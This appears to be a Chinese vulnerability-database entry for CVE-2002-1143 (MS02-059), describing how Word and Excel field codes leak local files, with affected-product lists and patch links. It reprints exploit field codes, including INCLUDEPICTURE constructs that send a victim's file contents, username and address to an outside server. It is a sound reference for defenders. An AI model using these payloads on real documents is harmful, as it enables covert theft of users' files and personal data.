CVE-2002-1143
CVSS5.0
发布时间 :2003-04-11 00:00:00
修订时间 :2016-10-17 22:24:01
NMCOES    

[原文]Microsoft Word and Excel allow remote attackers to steal sensitive information via certain field codes that insert the information when the document is returned to the attacker, as demonstrated in Word using (1) INCLUDETEXT or (2) INCLUDEPICTURE, aka "Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure."


[CNNVD]Microsoft Word INCLUDETEXT文档共享远程文件泄露漏洞(MS02-059)(CNNVD-200304-102)

        
        Microsoft Word和EXCEL是一款流行的办公软件。INCLUDETEXT字段代码用来插入任意本地文件到文档中。
        INCLUDETEXT字段代码(或称外部更新)存在安全问题,远程攻击者可以利用这个漏洞获取目标用户系统中的任意文件内容。
        Word和Excel提供一种机制可以把一个文档的数据插入和在其他文档中更新,这种机制在Word中成为字段代码(field codes)而在Excel成为外部更新,可以自动的减少用户手工操作数量。如Word字段代码可以在一个文档中插入标准法律声明段落,而在Excel中使用外部更新可以自动在不同表单中更新图表等。
        恶意使用字段代码和外部更新可以导致在没有任何提示的情况下窃取用户信息。部分事件可以出发字段代码和外部更新更新操作,如保存文档或者用户手工更新链接。一般来说用户会注意到这些更新的操作,但是,构建特殊的字段代码或者外部更新可以在没有任何指示的情况下发生,导致攻击者建立的恶意文档在打开的时候更新文档中包含的内容。
        如INCLUDETEXT字段代码(或称内部更新)可以包含在一个WORD文档中,并可以引用目标用户本地系统中的任意文件,然后目标用户把文档发送出去的时候,包含的本地文件也会发送出去。这在网络共享环境中攻击者可以利用这个漏洞获得其他用户本地系统文件。
        要利用这个漏洞,攻击者可以通过构建WEB页面提供恶意WORD文档,并诱使有此漏洞的用户查看。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:word:2002Microsoft Word 2002
cpe:/a:microsoft:excel:2002:sp2Microsoft Excel 2002 SP2
cpe:/a:microsoft:word:98::mac
cpe:/a:microsoft:word:::mac
cpe:/a:microsoft:word:2001::mac
cpe:/a:microsoft:word:2002:sp2Microsoft Word 2002 sp2
cpe:/a:microsoft:word:2000:sr1Microsoft Word 2000 sr1
cpe:/a:microsoft:word:2002:sp1Microsoft Word 2002 sp1
cpe:/a:microsoft:word:2000Microsoft Word 2000
cpe:/a:microsoft:word:98:::japanese
cpe:/a:microsoft:word:2000:sp2Microsoft Word 2000 sp2
cpe:/a:microsoft:word:97:sr1Microsoft Word 97 sr1
cpe:/a:microsoft:excel:2002:sp1Microsoft Excel 2002 SP1
cpe:/a:microsoft:word:97:sr2Microsoft Word 97 sr2
cpe:/a:microsoft:word:2000:sr1aMicrosoft Word 2000 sr1a
cpe:/a:microsoft:word:97Microsoft Word 97
cpe:/a:microsoft:word:98Microsoft Word 98
cpe:/a:microsoft:excel:2002Microsoft Excel 2002

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:202Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1143
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1143
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-102
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=103040003014999&w=2
(UNKNOWN)  BUGTRAQ  20020826 Security side-effects of Word fields
http://marc.info/?l=bugtraq&m=103252858816401&w=2
(UNKNOWN)  BUGTRAQ  20020919 More vulnerabilities (Re: Security side-effects of Word fields)
http://www.iss.net/security_center/static/10008.php
(VENDOR_ADVISORY)  XF  word-includetext-read-files(10008)
http://www.iss.net/security_center/static/10155.php
(UNKNOWN)  XF  word-includepicture-read-files(10155)
http://www.kb.cert.org/vuls/id/899713
(UNKNOWN)  CERT-VN  VU#899713
http://www.microsoft.com/technet/security/bulletin/ms02-059.asp
(VENDOR_ADVISORY)  MS  MS02-059
http://www.microsoft.com/technet/treeview/default.asp?url=/Technet/security/topics/secword.asp
(UNKNOWN)  CONFIRM  http://www.microsoft.com/technet/treeview/default.asp?url=/Technet/security/topics/secword.asp
http://www.securityfocus.com/bid/5586
(VENDOR_ADVISORY)  BID  5586
http://www.securityfocus.com/bid/5764
(UNKNOWN)  BID  5764

- 漏洞信息

Microsoft Word INCLUDETEXT文档共享远程文件泄露漏洞(MS02-059)
中危 设计错误
2003-04-11 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Word和EXCEL是一款流行的办公软件。INCLUDETEXT字段代码用来插入任意本地文件到文档中。
        INCLUDETEXT字段代码(或称外部更新)存在安全问题,远程攻击者可以利用这个漏洞获取目标用户系统中的任意文件内容。
        Word和Excel提供一种机制可以把一个文档的数据插入和在其他文档中更新,这种机制在Word中成为字段代码(field codes)而在Excel成为外部更新,可以自动的减少用户手工操作数量。如Word字段代码可以在一个文档中插入标准法律声明段落,而在Excel中使用外部更新可以自动在不同表单中更新图表等。
        恶意使用字段代码和外部更新可以导致在没有任何提示的情况下窃取用户信息。部分事件可以出发字段代码和外部更新更新操作,如保存文档或者用户手工更新链接。一般来说用户会注意到这些更新的操作,但是,构建特殊的字段代码或者外部更新可以在没有任何指示的情况下发生,导致攻击者建立的恶意文档在打开的时候更新文档中包含的内容。
        如INCLUDETEXT字段代码(或称内部更新)可以包含在一个WORD文档中,并可以引用目标用户本地系统中的任意文件,然后目标用户把文档发送出去的时候,包含的本地文件也会发送出去。这在网络共享环境中攻击者可以利用这个漏洞获得其他用户本地系统文件。
        要利用这个漏洞,攻击者可以通过构建WEB页面提供恶意WORD文档,并诱使有此漏洞的用户查看。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS02-059)以及相应补丁:
        MS02-059:Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure (Q330008)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS02-059.asp

        补丁下载:
         * Microsoft Word 2002:
        
        http://office.microsoft.com/downloads/2002/wrd1005.aspx

         * Microsoft Word 2000:
        
        http://office.microsoft.com/downloads/2000/wrd0902.aspx

         * Word 97/Word 98(J):
         Information on receiving Word 97 & Word 98(J) support is available
         at:
        
        http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q330080

         * Word X for Macintosh:
        
        http://www.microsoft.com/mac/download/security.asp

         * Word 2001 for Macintosh:
        
        http://www.microsoft.com/mac/download/security.asp

         * Word 98 for Macintosh:
        
        http://www.microsoft.com/mac/download/security.asp

         * Excel 2002:
        
        http://office.microsoft.com/downloads/2002/exc1003.aspx

- 漏洞信息 (21764)

MS Word 95/97/98/2000/2002 Excel 2002 INCLUDETEXT Document Sharing File Disclosure (EDBID:21764)
windows remote
2002-08-26 Verified
0 Alex Gantman
N/A [点击下载]
source: http://www.securityfocus.com/bid/5586/info

The Microsoft Word and Excel INCLUDETEXT Field Code may be used to insert an arbitrary local file into a document. The INCLUDETEXT Field Code is reported to, under some circumstances, present a security threat.

If the INCLUDETEXT Field Code is included in a document and references a file on the local system of the recipient, then the file will also be included when the document is sent out. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.

The recipient of the malicious document must still pass along the updated version of the document for the attacker to receive the imported local file.

** Reports indicate that using a 'dde' link group field may be able to bypass the functionality of the Microsoft patch for this issue.

Inserting the following field structure into the footer of the last page of the document will steal the contents of c:\a.txt on the target's computer:

{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\a.txt" "c:\\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }

(The curly braces above represent Microsoft Word field braces.)


		

- 漏洞信息 (21812)

MS Word 95/97/98/2000/2002 INCLUDEPICTURE Document Sharing File Disclosure (EDBID:21812)
windows remote
2002-09-20 Verified
0 Richard Edwards
N/A [点击下载]
source: http://www.securityfocus.com/bid/5764/info

The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.

If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.

An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system. 

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }

(The curly braces above represent Microsoft Word field braces.)

		

- 漏洞信息

10733
Microsoft Word/Excel Shared Document INCLUDETEXT Field Arbitrary File Read

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-08-26 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Word INCLUDEPICTURE Document Sharing File Disclosure Vulnerability
Design Error 5764
Yes No
2002-09-20 12:00:00 2009-07-11 05:06:00
Discovery of this vulnerability credited to Richard Edwards.

- 受影响的程序版本

Microsoft Word 98
Microsoft Word 97 SR2
Microsoft Word 97 SR1
Microsoft Word 97
+ Microsoft Office 97
Microsoft Word 95
Microsoft Word 2002 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Word 2002
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Word 2000 SR1a
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Word 2000 SR1
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Word 2000 SP2
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Word 2000
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- 漏洞讨论

The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.

If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.

An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system.

- 漏洞利用

The following examples were submitted by Alex Gantman <agantman@qualcomm.com>:

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }

(The curly braces above represent Microsoft Word field braces.)

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站